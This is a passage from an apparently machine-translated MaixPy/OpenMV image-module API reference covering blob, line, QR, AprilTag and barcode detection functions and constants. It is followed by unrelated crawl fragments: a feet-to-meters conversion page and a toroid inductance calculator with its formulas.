pixel area information in an image. For example, if you want to use the frame difference method to detect motion, you need to use this method to determine the change in the color channel of the image, which triggers the motion detection threshold.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nBins and other bins are the number of bins used for the histogram channel. For grayscale images, use bins, for RGB565 images, use each of the other channels. The bin count for each channel must be greater than 2. In addition, it makes no sense to set the bin count to a number greater than the unique pixel value of each channel. By default, the histogram will have the maximum number of bins per channel.\n\nCompressed images and bayer images are not supported.\n\n#### image.get_regression(thresholds[, invert=False[, roi[, x_stride=2[, y_stride=1[, area_threshold=10[, pixels_threshold=10[, robust=False]]]]]])\n\nPerform linear regression calculations on all threshold pixels of the image. This calculation is done by least squares, which is usually faster, but does not handle any outliers. If robust is True, the Theil index will be used. The Theil index calculates the median of all slopes between all threshold pixels in the image. If you set too many pixels after the threshold transition, even on an 80x60 image, this N^2 operation may lower your FPS below 5. However, as long as the number of pixels to be set after the threshold conversion is small, linear regression is effective even when the threshold pixel exceeding 30% is an abnormal value.\n\nThis method returns an image.line object. How to easily use straight line objects, see the following blog post: https://openmv.io/blogs/news/linear-regression-line-following\n\nThe thresholds must be a list of tuples. [(lo, hi), (lo, hi), ..., (lo, hi)] Define the range of colors you want to track. For grayscale images, each tuple needs to contain two values ​​- the minimum gray value and the maximum gray value. Only pixel regions that fall between these thresholds are considered. For RGB565 images, each tuple needs to have six values ​​(l_lo, l_hi, a_lo, a_hi, b_lo, b_hi) - the minimum and maximum values ​​for the LAB L, A and B channels, respectively. For ease of use, this feature will automatically fix the minimum and maximum values ​​of the exchange. Also, if the tuple is greater than six values, the remaining values ​​are ignored. Conversely, if the tuple is too short, the remaining thresholds are assumed to be in the maximum range.\n\nTo get the threshold of the tracked object, simply select (click and drag) the tracked object in the IDE framebuffer. The histogram will be updated accordingly to the area. Then just write down the color distribution in the starting and falling positions in each histogram channel. These will be the low and high values ​​of thresholds. Since the difference between the upper and lower quartiles is small, the threshold is manually determined.\n\nYou can also determine the color threshold by going to Tools -> Machine Vision -> Threshold Editor in the OpenMV IDE and dragging the slider from the GUI window.\n\nInvert Reverses the threshold operation, where pixels are matched outside of the known color range, not within the known color range.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nX_stride is the number of x pixels to skip when calling a function.\n\nY_stride is the number of y pixels to skip when calling a function.\n\nReturns None if the bounding box area after the regression is smaller than area_threshold .\n\nReturns None if the number of pixels after regression is less than pixel_threshold .\n\nCompressed images and bayer images are not supported.\n\n#### image.find_blobs(thresholds[, invert=False[, roi[, x_stride=2[, y_stride=1[, area_threshold=10[, pixels_threshold=10[, merge=False[, margin=0[, threshold_cb =None[, merge_cb=None]]]]]]]]]]])\n\nFinds all the patches in the image and returns a list of patch objects that include each patch. Please observe the image.blob object for more information.\n\nThe thresholds must be a list of tuples. [(lo, hi), (lo, hi), ..., (lo, hi)] Define the range of colors you want to track. For grayscale images, each tuple needs to contain two values ​​- the minimum gray value and the maximum gray value. Only pixel regions that fall between these thresholds are considered. For RGB565 images, each tuple needs to have six values ​​(l_lo, l_hi, a_lo, a_hi, b_lo, b_hi) - the minimum and maximum values ​​for the LAB L, A and B channels, respectively. For ease of use, this feature will automatically fix the minimum and maximum values ​​of the exchange. Also, if the tuple is greater than six values, the remaining values ​​are ignored. Conversely, if the tuple is too short, the remaining thresholds are assumed to be in the maximum range.\n\nannotation\n\nTo get the threshold of the tracked object, simply select (click and drag) the tracking object in the IDE framebuffer. The histogram will be updated accordingly to the area. Then just write down the color distribution in the starting and falling positions in each histogram channel. These will be the low and high values ​​of thresholds. Since the difference between the upper and lower quartiles is small, the threshold is manually determined.\n\nYou can also determine the color threshold by going to Tools -> Machine Vision -> Threshold Editor in the OpenMV IDE and dragging the slider from the GUI window.\n\nInvert Reverses the threshold operation, where pixels are matched outside of the known color range, not within the known color range.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nX_stride is the number of x pixels that need to be skipped when looking for a patch. Once the color block is found, the line fill algorithm will be precise pixels. If the color block is known to be large, increase x_stride to increase the speed at which the color block is found.\n\nY_stride is the number of y pixels that need to be skipped when looking for a patch. Once the color block is found, the line fill algorithm will be precise pixels. If the color block is known to be large, increase y_stride to increase the speed at which the patch is found.\n\nIf the bounding box area of ​​a patch is smaller than area_threshold, it will be filtered out.\n\nIf the number of pixels in a patch is smaller than pixel_threshold, it will be filtered out.\n\nMerge If True, merges all the patches that have not been filtered. The border rectangles of these patches overlap each other. Margin can be used in the intersection test to increase or decrease the size of the patch boundary rectangle. For example, patches with edges of 1 and border rectangles of 1 will be merged.\n\nMerging patches allows color code tracking to be achieved. Each patch object has a code value code , which is a bit vector. For example, if you enter two color thresholds in image.find_blobs, the first threshold code is 1 and the second code is 2 (the third code is 4, the fourth code is 8, and so on). Merged patches use logical OR operations on all code so you know the color that produced them. This allows you to track two colors, and if you get a patch object in two colors, it might be a color code.\n\nIf you use a strict color range and cannot fully track all the pixels of the target object, you may need to merge the patches.\n\nFinally, if you want to merge the patches, but don't want the two different threshold colors to be merged, just call image.find_blobs twice, and the different threshold patches will not be merged.\n\nThe threshold_cb can be set to a function that calls each color block after threshold filtering to filter it out of the list of patches to be merged. The callback function will receive a parameter: the patch object to be filtered. The callback function then returns True to preserve the color block or return False to filter the color block.\n\nMerge_cb can be set to function to call two patches to be merged to disable or permit the merge. The callback function will receive two arguments - two patch objects that will be merged. The callback function must return True to merge the color blocks, or return False to prevent color block merging.\n\nCompressed images and bayer images are not supported.\n\n#### image.find_lines([roi[, x_stride=2[, y_stride=1[, threshold=1000[, theta_margin=25[, rho_margin=25]]]]])\n\nUse the Hough transform to find all the lines in the image. Returns a list of image.line objects.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nX_stride is the number of x pixels that need to be skipped during the Hough transform. If the line is known to be large, increase x_stride.\n\nY_stride is the number of y pixels that need to be skipped during the Hough transform. If the line is known to be large, increase y_stride.\n\nThreshold Controls the line that is detected from the Hough transform. Only return lines that are greater than or equal to threshold. The correct threshold value for the application depends on the image. Note: The magnitude of a line is the sum of the size of all Sobel filter pixels that make up the line.\n\nTheta_margin controls the merging of the lines being monitored. The part of the line angle of theta_margin is merged with the part of the line p value of rho_margin.\n\nRho_margin controls the merging of the lines being monitored. The part of the line angle of theta_margin is merged with the part of the line p value of rho_margin.\n\nThe method performs a Hough transform by running a Sobel filter on the image and using the amplitude and gradient response of the filter. No pre-processing of the image is required. However, cleaning up the image filter results in more stable results.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.find_line_segments([roi[, merge_distance=0[, max_theta_difference=15]]])\n\nUse Hough transform to find line segments in the image. Returns a list of image.line objects.\n\nRoi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI is the image rectangle. The operating range is limited to pixels in the roi area.\n\nMerge_distance specifies the maximum number of pixels between two segments that can be separated from each other without being merged.\n\nMax_theta_difference is the maximum angle difference between the two line segments that merge_distancede will merge above.\n\nThis method uses the LSD library (also used by OpenCV) to find line segments in the image. This is a bit slow, but very accurate, the line segments won't jump.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.find_circles([roi[, x_stride=2[, y_stride=1[, threshold=2000[, x_margin=10[, y_margin=10[, r_margin=10]]]]]])\n\nUse the Hough transform to find a circle in the image. Returns a list of image.circle objects (see above).\n\nRoi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI is the image rectangle. The operating range is limited to pixels in the roi area.\n\nX_stride is the number of x pixels that need to be skipped during the Hough transform. If the circle is known to be large, increase x_stride.\n\nY_stride is the number of y pixels that need to be skipped during the Hough transform. If the circle is known to be large, increase y_stride.\n\nThreshold Controls the circle detected from the Hough transform. Only returns a circle greater than or equal to threshold. The correct threshold value for the application depends on the image. Note: The magnitude of a circle is the sum of the size of all Sobel filter pixels that make up the circle.\n\nX_margin controls the merge of the detected circles. The round pixels are partially merged for x_margin , y_margin , and r_margin .\n\nY_margin controls the merge of the detected circles. The round pixels are partially merged for x_margin , y_margin , and r_margin .\n\nR_margin Controls the merge of the detected circles. The round pixels are partially merged for x_margin , y_margin , and r_margin .\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.find_rects([roi=Auto, threshold=10000])\n\nUse the same quad detection algorithm used to find AprilTAg to find rectangles in the image. Ideal for rectangles that contrast sharply with the background. AprilTag's quad detection can handle arbitrary scaling/rotating/cutting rectangles. Returns a list of image.rect objects.\n\nRoi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI is the image rectangle. The operating range is limited to pixels in the roi area.\n\nThe border size (by sliding the Sobel operator over all pixels on the edge of the rectangle and adding the value) is smaller than the rectangle of the threshold and is filtered from the return list. The correct value for threshold depends on your application/scenario.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.find_qrcodes([roi])\n\nFind all the QR codes in roi and return a list of image.qrcode objects. Please refer to the image.qrcode object for more information.\n\nIn order for this method to work successfully, the QR code on the image needs to be flat. By using the sensor.set_windowing function to zoom in at the center of the lens, the image.lens_corr function to dissipate the barrel distortion of the lens, or by replacing a lens with a narrow field of view, you get a flatter QR code that is unaffected by lens distortion. Some machine vision lenses do not cause barrel distortion, but they are much more expensive than the standard lenses offered by OpenMV, which is an undistorted lens.\n\nRoi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\nImage.find_apriltags([roi[, families=image.TAG36H11[, fx[, fy[, cx[, cy]]]]]) Find all AprilTags in roi and return a list of image.apriltag objects. Please refer to the image.apriltag object for more information.\n\nCompared to QR codes, AprilTags can be detected in longer distances, poorer light, and more distorted image environments. AprilTags can handle all kinds of image distortion problems, and the QR code does not. That is, AprilTags can only encode the digital ID as its payload.\n\nAprilTags can also be used for localization. Each image.apriltag object returns its three-dimensional position information and rotation angle from the camera. The position information is determined by fx, fy, cx, and cy, which are the focal length and center point of the image in the X and Y directions, respectively.\n\nCreate AprilTags using the Tag Generator tool built into OpenMV IDE. The tag generator creates a printable 8.5\"x11\" AprilTags.\n\nRoi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nThe family is the bit mask of the tag family to be decoded. Is a logical or:\n\nimage.TAG16H5 image.TAG25H7 image.TAG25H9 image.TAG36H10 image.TAG36H11 image.ARTOOLKIT The default setting is the best image.TAG36H11 tag family. Note: every time a tag family is enabled, the speed of find_apriltags will be slightly slower.\n\nFx is the focal length of the camera's x-direction in pixels. The value of the standard OpenMV Cam is (2.8 / 3.984) * 656, which is obtained by dividing the focal length value of the millimeter by the length of the photosensitive element in the X direction and multiplying by the number of pixels of the photosensitive element in the X direction (for the OV7725 photosensitive element) In terms of).\n\nFy is the focal length of the camera in the y direction in pixels. The value of the standard OpenMV Cam is (2.8 / 2.952) * 488, which is obtained by dividing the focal length value of the millimeter meter by the length of the photosensitive element in the Y direction, and multiplying by the number of pixels of the photosensitive element in the Y direction (for the OV7725 photosensitive element) In terms of).\n\nCx is the center of the image, image.width()/2 , not roi.w()/2 .\n\nCy is the center of the image, image.height()/2, not roi.h()/2 .\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\nImage.find_datamatrices([roi[, effort=200]]) Finds all the data matrices in roi and returns a list of image.datamatrix objects. Please refer to the image.datamatrix object for more information.\n\nIn order for this method to work successfully, the rectangular code on the image needs to be flat. By using the sensor.set_windowing function to zoom in on the center of the lens, the image.lens_corr function to dissipate the barrel distortion of the lens, or by replacing a lens with a narrow field of view, you get a flatter rectangular code that is unaffected by lens distortion. Some machine vision lenses do not cause barrel distortion, but they are much more expensive than the standard lenses offered by OpenMV, which is an undistorted lens.\n\nRoi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nThe effort controls the time used to find the rectangular code match. The default value of 200 should apply to all use cases. However, you may also increase the detection at the expense of the frame rate or increase the frame rate at the expense of detection. Note: If the effort is set below about 160, you will not be able to perform any tests; instead, you can set it to any high value you want, but if the setting is higher than 240, the detection rate will not continue to increase.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.find_barcodes([roi])\n\nFind all the 1D barcodes in roi and return a list of image.barcode objects. Please refer to the image.barcode object for more information.\n\nFor best results, use a long 640, wide 40/80/160 window. The lower the degree of verticality, the faster the speed. Since the barcode is a linear one-dimensional image, it is only necessary to have a higher resolution in one direction and a lower resolution in the other direction. Note: This function performs horizontal and vertical scanning, so you can use a window with a width of 40/80/160 and a length of 480. Finally, be sure to adjust the lens so that the bar code is positioned where the focal length produces the sharpest image. Fuzzy barcodes cannot be decoded.\n\nThis function supports all 1D barcodes:\n\nimage.EAN2 image.EAN5 image.EAN8 image.UPCE image.ISBN10 image.UPCA image.EAN13 image.ISBN13 image.I25 image.DATABAR (RSS-14) image.DATABAR_EXP (RSS-Expanded) image.CODABAR image.CODE39 image.PDF417 image.CODE93 image.CODE128 Roi is a region of interest (x, y, w, h) of a rectangle to be copied. If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nCompressed images and bayer images are not supported.\n\nThis method is not available on OpenMV Cam M4.\n\nImage.find_displacement(template[, roi[, template_roi[, logpolar=False]]]) Find the transform offset for this image from the template. This method can be used to make light flow. This method returns an image.displacement object containing the results of the displacement calculation using phase correlation.\n\nRoi is a rectangular area (x, y, w, h) that needs to be processed. If not specified, it is equal to the image rectangle.\n\nTemplate_roi is the rectangular area (x, y, w, h) that needs to be processed. If not specified, it is equal to the image rectangle.\n\nRoi and template roi must have the same w/h, but x/y can be anywhere in the image. You can slide a smaller rois on a larger image to get a smoother image of the light flow.\n\nImage.find_displacement usually calculates the x/y translation between two images. However, if you set logpolar = True , it will find a change in rotation and scaling between the two images. The same image.displacement object results in two possible feedbacks.\n\nCompressed images and bayer images are not supported.\n\nannotation\n\nUse this method on images with a uniform length and width (for example, `sensor.B64X64`).\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.find_number(roi)\n\nA LENET-6 CNN (Convolutional Neural Network) trained on the MINST data set is run to detect numbers in the 28x28 ROI located anywhere on the image. Returns a tuple containing integers and floating point numbers representing the detected number (0-9) and the confidence of the detection (0-1).\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nOnly grayscale images are supported.\n\nannotation\n\nThis method is experimental. This method may be removed if you run any CNN that Caffe trains on your PC in the future. This function has been removed by the latest 3.0.0 firmware.\n\nThis method is not available on OpenMV Cam M4.\n\n#### image.classify_object(roi)\n\nRun CIFAR-10 CNN on the ROI of the image to detect aircraft, cars, birds, cats, deer, dogs, frogs, horses, boats and trucks. This method automatically scales the image internally to 32x32 to feed to the CNN.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nOnly RGB565 images are supported.\n\nannotation\n\nThis method is experimental. This method may be removed if you run any CNN that Caffe trains on your PC in the future.\n\nThis method is not available on OpenMV Cam M4.\n\nImage.find_template(template, threshold[, roi[, step=2[, search=image.SEARCH_EX]]]) Try to find the location of the first template match in the image using the Normalized Cross Correlation (NCC) algorithm. Returns the bounding box tuple (x, y, w, h) of the matching position, otherwise returns None.\n\nTemplate is a small image object that matches this image object. Note: Both images must be grayscale.\n\nThreshold is a floating point number (0.0-1.0), where a smaller value increases the detection rate while increasing the false positive rate. Conversely, a higher value reduces the detection rate while reducing the false positive rate.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nStep is the number of pixels that need to be skipped when looking up the template. Skip pixels can greatly increase the speed at which the algorithm runs. This method is only applicable to the algorithm in SERACH_EX mode.\n\nSearch can be used for image.SEARCH_DS or image.SEARCH_EX. image.SEARCH_DS The algorithm used for searching templates is faster than image.SEARCH_EX, but if the template is around the edges of the image, it may not be searched successfully. image.SEARCH_EX performs a more detailed search of the image, but it runs much faster than image.SEARCH_DS .\n\nOnly grayscale images are supported.\n\nThis method searches for images of all regions that match Haar Cascade and returns a list of bounding box rectangle tuples (x, y, w, h) for these features. If no features are found, a blank list is returned.\n\nThreshold is a floating point number (0.0-1.0), where a smaller value increases the detection rate while increasing the false positive rate. Conversely, a higher value reduces the detection rate while reducing the false positive rate.\n\nScale is a floating point number that must be greater than 1.0. A higher scale factor runs faster, but its image matching is poorer. The ideal value is between 1.35 and 1.5.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nOnly grayscale images are supported.\n\n#### image.find_eye(roi)\n\nFind the pupil in the region of interest (x, y, w, h) around the eye. Returns a tuple containing the position of the pupil (x, y) in the image. If no pupil is found, it returns (0,0).\n\nBefore using this function, you first need to search for someone's face using image.find_features() and Haar operator frontalface. Then use image.find_features and Haar operator find_eye to search for the eye on the face. Finally, this method is called on each eye ROI returned after calling the image.find_features function to get the coordinates of the pupil.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nOnly grayscale images are supported.\n\n#### image.find_lbp(roi)\n\nThe LBP (local binary mode) key points are extracted from the ROI tuple (x, y, w, h). You can use the image.match_descriptor function to compare two sets of key points to get the matching distance.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nOnly grayscale images are supported.\n\n#### image.find_keypoints([roi[, threshold=20[, normalized=False[, scale_factor=1.5[, max_keypoints=100[, corner_detector=image.CORNER_AGAST]]]]])\n\nThe ORB key points are extracted from the ROI tuple (x, y, w, h). You can use the image.match_descriptor function to compare two sets of key points to get the matching area. If no key is found, return None.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nThreshold is a number that controls the number of extractions (values ​​0-255). For the default AGAST corner detector, this value should be around 20. For the FAST corner detector, this value is approximately 60-80. The lower the threshold, the more corner points you extract.\n\nNormalized is a boolean value. If True, close the extraction keypoint at multiple resolutions. If you don't care about handling extensions and want the algorithm to run faster, set it to True.\n\nScale_factor is a floating point number that must be greater than 1.0. A higher scale factor runs faster, but its image matching is poorer. The ideal value is between 1.35 and 1.5.\n\nMax_keypoints is the maximum number of key points a keypoint object can hold. If the key point object is too large and causes memory problems, lower the value.\n\nCorner_detector is the corner detector algorithm used to extract key points from an image. Can be image.CORNER_FAST or image.CORNER_AGAST . The FAST corner detector runs faster, but with less accuracy.\n\nOnly grayscale images are supported.\n\n#### image.find_edges(edge_type[, threshold])\n\nTurn the image into black and white and leave only the edges as white pixels.\n\nimage.EDGE_SIMPLE - Simple threshold high-pass filtering algorithm image.EDGE_CANNY - Canny edge detection algorithm Threshold is a binary tuple containing a low threshold and a high threshold. You can control the edge quality by adjusting this value.\n\nThe default is (100, 200).\n\nOnly grayscale images are supported.\n\nFind_hog([roi[, size=8]]) The pixels in the ROI are replaced with HOG (Directed Gradient Histogram) lines.\n\nRoi is a rectangular tuple of interest regions (x, y, w, h). If not specified, the ROI is the image rectangle of the entire image. The operating range is limited to pixels in the roi area.\n\nOnly grayscale images are supported.\n\nThis method is not available on OpenMV Cam M4.\n\n## 24. Constant\n\n### 24.1. image.SEARCH_EX\n\nDetailed template matching search.\n\n### 24.2. image.SEARCH_DS\n\nFaster template matching search.\n\n### 24.3. image.EDGE_CANNY\n\nEdge detection is performed on the image using the Canny edge detection algorithm.\n\n### 24.4. image.EDGE_SIMPLE\n\nEdge detection is performed on the image using a threshold high-pass filtering algorithm.\n\n### 24.5. image.CORNER_FAST\n\nHigh-speed low-accuracy corner detection algorithm for ORB key points\n\n### 24.6. image.CORNER_AGAST\n\nLow speed high accuracy algorithm for ORB key points.\n\n### 24.7. image.TAG16H5\n\nBitmask enumeration for the TAG1H5 tag group. Used in AprilTags.\n\n### 24.8. image.TAG25H7\n\nBitmask enumeration for the TAG25H7 tag group. Used in AprilTags.\n\n### 24.9. image.TAG25H9\n\nBitmask enumeration for the TAG25H9 tag group. Used in AprilTags.\n\n### 24.10. image.TAG36H10\n\nBitmask enumeration for the TAG36H10 tag group. Used in AprilTags.\n\n### 24.11. image.TAG36H11\n\nBitmask enumeration for the TAG36H11 tag group. Used in AprilTags.\n\n### 24.12. image.ARTOOLKIT\n\nThe bit mask enumeration of the ARTOOLKIT tag group. Used in AprilTags.\n\n### 24.13. image.EAN2\n\nEAN2 barcode type enumeration.\n\n### 24.14. image.EAN5\n\nEAN5 barcode type enumeration.\n\n### 24.15. image.EAN8\n\nEAN8 barcode type enumeration.\n\n### 24.16. image.UPCE\n\nUPCE barcode type enumeration.\n\n### 24.17. image.ISBN10\n\nISBN10 barcode type enumeration.\n\n### 24.18. image.UPCA\n\nUPCA barcode type enumeration.\n\n### 24.19. image.EAN13\n\nEAN13 barcode type enumeration.\n\n### 24.20. image.ISBN13\n\nISBN13 barcode type enumeration.\n\n### 24.21. image.I25\n\nI25 barcode type enumeration.\n\n### 24.22. image.DATABAR\n\nDATABAR barcode type enumeration.\n\n### 24.23. image.DATABAR_EXP\n\nDATABAR_EXP barcode type enumeration.\n\n### 24.24. image.CODABAR\n\nCODABAR barcode type enumeration.\n\n### 24.25. image.CODE39\n\nCODE39 barcode type enumeration.\n\n### 24.26. image.PDF417\n\nPDF417 barcode type enumeration (currently not working).\n\n### 24.27. image.CODE93\n\nCODE93 barcode type enumeration.\n\n### 24.28. image.CODE128\n\nCODE128 barcode type enumeration." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.81068635,"math_prob":0.92471546,"size":124408,"snap":"2019-43-2019-47","text_gpt3_token_len":28545,"char_repetition_ratio":0.2191489,"word_repetition_ratio":0.5746944,"special_character_ratio":0.2362549,"punctuation_ratio":0.1331959,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9607215,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-21T01:02:57Z\",\"WARC-Record-ID\":\"<urn:uuid:5fe2f681-25c7-4ffc-8d49-7d4baeb6bf2e>\",\"Content-Length\":\"251915\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3a41a395-e948-460f-ab65-d07e88db1806>\",\"WARC-Concurrent-To\":\"<urn:uuid:75e74503-b879-49cd-a355-e2d071ac369c>\",\"WARC-IP-Address\":\"185.199.109.153\",\"WARC-Target-URI\":\"https://maixpy.sipeed.com/en/libs/machine_vision/image.html\",\"WARC-Payload-Digest\":\"sha1:TCS3KTOQTZFFICFDFP62QZHAV4TKSQAZ\",\"WARC-Block-Digest\":\"sha1:X5TKZWPG25PQWZ4GGWLVY63ADN4OMV36\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670643.58_warc_CC-MAIN-20191121000300-20191121024300-00274.warc.gz\"}"}
https://feet-to-meters.appspot.com/pl/2594-stopa-na-metr.html
[ "Feet To Meters\n\n# 2594 ft to m2594 Foot to Meters\n\nft\n=\nm\n\n## How to convert 2594 foot to meters?\n\n 2594 ft * 0.3048 m = 790.6512 m 1 ft\nA common question is How many foot in 2594 meter? And the answer is 8510.49868766 ft in 2594 m. Likewise the question how many meter in 2594 foot has the answer of 790.6512 m in 2594 ft.\n\n## How much are 2594 feet in meters?\n\n2594 feet equal 790.6512 meters (2594ft = 790.6512m). Converting 2594 ft to m is easy. Simply use our calculator above, or apply the formula to change the length 2594 ft to m.\n\n## Convert 2594 ft to common lengths\n\nUnitLength\nNanometer7.906512e+11 nm\nMicrometer790651200.0 µm\nMillimeter790651.2 mm\nCentimeter79065.12 cm\nInch31128.0 in\nFoot2594.0 ft\nYard864.666666666 yd\nMeter790.6512 m\nKilometer0.7906512 km\nMile0.4912878788 mi\nNautical mile0.4269174946 nmi\n\n## What is 2594 feet in m?\n\nTo convert 2594 ft to m multiply the length in feet by 0.3048. The 2594 ft in m formula is [m] = 2594 * 0.3048. Thus, for 2594 feet in meter we get 790.6512 m.\n\n## 2594 Foot Conversion Table", null, "## Alternative spelling\n\n2594 ft to Meter, 2594 ft in Meter, 2594 Feet to Meter, 2594 Feet in Meter, 2594 ft to m, 2594 ft in m, 2594 Feet in m, 2594 Foot in Meter, 2594 Feet to Meters, 2594 Feet in Meters," ]
[ null, "https://feet-to-meters.appspot.com/image/2594.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83308744,"math_prob":0.8773278,"size":676,"snap":"2022-40-2023-06","text_gpt3_token_len":230,"char_repetition_ratio":0.22916667,"word_repetition_ratio":0.015267176,"special_character_ratio":0.4408284,"punctuation_ratio":0.15337424,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9729101,"pos_list":[0,1,2],"im_url_duplicate_count":[null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-29T06:19:35Z\",\"WARC-Record-ID\":\"<urn:uuid:6bb4000f-9b76-439d-9306-15c767b08c0d>\",\"Content-Length\":\"28184\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ecb54164-39c9-4ac6-b497-6058a4948ca9>\",\"WARC-Concurrent-To\":\"<urn:uuid:6b5df679-2e22-42ba-85f0-2eab6c4ed407>\",\"WARC-IP-Address\":\"142.251.16.153\",\"WARC-Target-URI\":\"https://feet-to-meters.appspot.com/pl/2594-stopa-na-metr.html\",\"WARC-Payload-Digest\":\"sha1:A4BAPZSVYMIS2UP72TKBR2LPASYSNWGB\",\"WARC-Block-Digest\":\"sha1:YP2NJHAUGUS6PNX4BSNCLIKGQDEEUSQ5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030335304.71_warc_CC-MAIN-20220929034214-20220929064214-00045.warc.gz\"}"}
https://www.easycalculation.com/engineering/electrical/toroid-inductance-calculator.php
[ "# Toroid Inductance Per Turn Calculator\n\nToroidal inductors are used where large inductance are required at low frequency levels. These are insulated coils in ring shape. As toroid inductors have more number of turns it can carry more currents. This online electrical calculator allows you to calculate the toroid inductance value per turn.\n\n## Toroid Inductance Per Turn Calculator\n\nuH\ngauss/A\n\nToroidal inductors are used where large inductance are required at low frequency levels. These are insulated coils in ring shape. As toroid inductors have more number of turns it can carry more currents. This online electrical calculator allows you to calculate the toroid inductance value per turn.\n\nCode to add this calci to your website", null, "", null, "#### Formula:", null, "L = 2*N2*μr*h*In(d1/d2) Ae = (h/2) * (d1-d2) Le = ( π * (d1-d2) ) / In(d1/d2) Ve = Ae * Le B/I = (0.4π*μr*N) / Le\nWhere, L = Inductance N = number of turns μr = Relative permeability h = Core width d1 = Outer diameter d2 = Inner diameter Ae = Effective core area Le = Effective core length Ve = Effective core volume B/I = Flux Density per Amp\n\nCalculating inductance of a toroid core coil is made easier with this electrical calculator." ]
[ null, "https://www.easycalculation.com/images/embed-plus.gif", null, "https://www.easycalculation.com/images/embed-minus.gif", null, "https://www.easycalculation.com/engineering/electrical/ToroidInductance.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90733105,"math_prob":0.9979396,"size":692,"snap":"2023-40-2023-50","text_gpt3_token_len":143,"char_repetition_ratio":0.1497093,"word_repetition_ratio":0.8269231,"special_character_ratio":0.16763006,"punctuation_ratio":0.07692308,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99920636,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-05T03:11:22Z\",\"WARC-Record-ID\":\"<urn:uuid:0940babc-4fd9-4111-a752-ce668f04bd73>\",\"Content-Length\":\"27413\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:112af012-c539-4910-83dc-a88fda2a2e2e>\",\"WARC-Concurrent-To\":\"<urn:uuid:47cb66ec-0318-47f4-a53c-c30d88407a55>\",\"WARC-IP-Address\":\"173.255.199.118\",\"WARC-Target-URI\":\"https://www.easycalculation.com/engineering/electrical/toroid-inductance-calculator.php\",\"WARC-Payload-Digest\":\"sha1:UBW2GFMRLVVFERJA7VUX6WZKSLSIGMEP\",\"WARC-Block-Digest\":\"sha1:BNF6GW2DPKUHHT4VOGKZJQ2TDNURF6JU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100540.62_warc_CC-MAIN-20231205010358-20231205040358-00344.warc.gz\"}"}
https://fr.mathworks.com/matlabcentral/cody/problems/2063-a-matrix-of-extroverts
